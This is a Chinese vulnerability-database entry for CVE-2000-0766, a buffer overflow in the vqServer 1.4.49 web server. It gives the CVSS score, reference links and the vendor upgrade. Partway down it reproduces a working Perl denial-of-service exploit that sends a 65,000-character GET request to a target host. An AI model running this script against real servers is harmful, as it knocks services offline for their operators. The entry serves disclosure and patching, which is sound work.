CVE-2000-0766
CVSS7.5
发布时间 :2000-10-20 00:00:00
修订时间 :2008-09-05 16:21:50
NMCOE    

[原文]Buffer overflow in vqSoft vqServer 1.4.49 allows remote attackers to cause a denial of service or possibly gain privileges via a long HTTP GET request.


[CNNVD]vqSoft vqServer 1.4.49远程长URL拒绝服务攻击漏洞(CNNVD-200010-028)

        
        vqServer是一个小型的Web服务器程序,运行于Microsoft Windows系统下。
        vqServer 1.4.49实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞对服务器进行拒绝服务攻击。
        远程攻击者如果给服务器发送长达65000个字节的"GET"请求,服务器将会停止响应。必需重启才能恢复提供正常服务。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0766
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0766
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-028
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/1610
(VENDOR_ADVISORY)  BID  1610
http://www.securityfocus.com/templates/archive.pike?list=1&msg=200008270354.UAA10952@user4.hushmail.com
(VENDOR_ADVISORY)  BUGTRAQ  20000819 D.o.S Vulnerability in vqServer
http://xforce.iss.net/static/5152.php
(UNKNOWN)  XF  vqserver-get-dos

- 漏洞信息

vqSoft vqServer 1.4.49远程长URL拒绝服务攻击漏洞
高危 未知
2000-10-20 00:00:00 2005-05-02 00:00:00
远程  
        
        vqServer是一个小型的Web服务器程序,运行于Microsoft Windows系统下。
        vqServer 1.4.49实现上存在缓冲区溢出漏洞,远程攻击者可能利用此漏洞对服务器进行拒绝服务攻击。
        远程攻击者如果给服务器发送长达65000个字节的"GET"请求,服务器将会停止响应。必需重启才能恢复提供正常服务。
        

- 公告与补丁

        厂商补丁:
        vqSoft
        ------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        vqSoft Upgrade vqserver.zip
        
        http://www.vqsoft.com/vq/server/vqserver.zip

- 漏洞信息 (20178)

vqSoft vqServer 1.4.49 DoS Vulnerability (EDBID:20178)
multiple dos
2000-08-19 Verified
0 sinfony
N/A [点击下载]
source: http://www.securityfocus.com/bid/1610/info

vqServer 1.4.49 is subject to a buffer overflow. If a GET request is sent to the server containing 65 000 characters the server will stop responding. A reboot is required in order to gain normal functionality.


#!/usr/bin/perl 
# DoS exploit for vqServer 1.4.49 
# This vulnerability was discovered by nemesystm 
# (auto45040@hushmail.com)
#
# code by: sinfony    (chinesef00d@hotmail.com) 
# [confess.sins.labs] (http://www.ro0t.nu/csl) 
# and DHC member	    
#
# kiddie quote of the year:
# <gammbitr> dude piffy stfu i bet you don't even know how to exploit it 

die "vqServer 1.4.49 DoS by sinfony (chinesef00d\@hotmail.com)\n
usage: $0 <host> \n" 
if $#ARGV != 0; 

use IO::Socket;

$host = $ARGV[0];
$port = 80;

print "Connecting to $host on port $port...\n"; 
$suck = IO::Socket::INET->
	new(Proto=>"tcp", 
	PeerAddr=>$host,
	PeerPort=>$port)
	|| die "$host isnt a webserver you schmuck.\n"; 

$a = A;
$send = $a x 65000;
	print "Connected, sending exploit.\n";
	print $suck "GET /$send\n"; 
sleep(3); 
	print "Exploit sent. vqServer should be dead.\n";
close($suck)

		

- 漏洞信息

1529
vqSoft vqServer HTTP GET Request Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public Third-party Verified

- 漏洞描述

- 时间线

2000-08-19 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1.9.47 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站